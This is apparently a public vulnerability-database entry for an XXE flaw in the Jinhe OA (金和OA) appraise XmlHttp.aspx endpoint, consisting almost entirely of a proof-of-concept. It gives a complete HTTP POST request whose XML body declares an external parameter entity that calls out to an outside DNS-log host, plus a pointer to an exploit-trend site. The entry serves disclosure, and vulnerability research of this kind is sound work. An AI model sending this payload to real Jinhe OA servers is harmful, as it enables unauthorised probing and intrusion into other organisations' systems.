金和OA appraise-XmlHttp XXE漏洞

2025-11-06 金和OA PoC Public

Description

金和OA appraise-XmlHttp XXE漏洞

PoC

POST /c6/Jhsoft.Web.appraise/XmlHttp.aspx/ HTTP/1.1
Host: 
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxe.dnslog.pt/xxe_test">
%remote;]>
<root/>

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities